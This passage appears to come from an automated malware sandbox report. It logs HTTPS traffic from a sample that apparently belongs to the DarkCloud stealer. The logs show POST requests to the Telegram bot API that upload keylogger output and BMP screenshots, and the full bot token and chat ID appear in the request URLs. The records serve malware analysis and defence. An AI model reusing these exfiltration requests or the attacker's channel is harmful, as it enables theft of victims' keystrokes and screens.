                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotqxCnRKHO.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:39 UTC232OUTData Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:40:39 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:44 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:44 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 600
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.649917149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:46 UTC558OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-KL:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 568
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:46 UTC568OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 58 41 62 74 6b 62 56 43 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 33 35 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 33 35 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 37 3a 34 30 3a 33 35 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataXAbtkbVC.txt"Content-Type: application/octet-stream[07:40:35]<<Program Manager>>[07:40:35]<<Program Manager>>[07:40:35]<<Program Mana
                                                                                      2024-11-25 12:40:47 UTC388INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 25 Nov 2024 12:40:46 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 595
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-11-25 12:40:47 UTC595INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 35 30 36 38 30 31 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 44 61 72 6b 63 6c 6f 75 64 5f 52 65 73 75 6c 74 5f 62 6f 78 38 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 31 31 35 38 35 30 36 38 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 68 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 42 6f 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 52 77 65 62 63 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64
                                                                                      Data Ascii: {"ok":true,"result":{"message_id":2536,"from":{"id":8165068013,"is_bot":true,"first_name":"Darkcloud_Result_box8","username":"Darkcloud_Result_box8_Bot"},"chat":{"id":6115850689,"first_name":"Chi","last_name":"Boy","username":"HRwebc","type":"private"},"d


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.649927149.154.167.2204434304C:\Users\user\Desktop\wMy37vlfvz.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-25 12:40:50 UTC562OUTPOST /bot8165068013:AAFuCn4n-0ULh45xSnNPfqymllZH1zW0UYM/sendDocument?chat_id=6115850689&caption=DC-SC:::user-PC\user\8.46.123.75 HTTP/1.1
                                                                                      Accept: */*
                                                                                      Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113
                                                                                      Accept-Language: en-ch
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 3932422
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 79 61 4a 77 41 6a 51 73 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a
                                                                                      Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotyaJwAjQs.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00
                                                                                      Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
                                                                                      Data Ascii:
                                                                                      2024-11-25 12:40:50 UTC16355OUTData Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14
                                                                                      Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
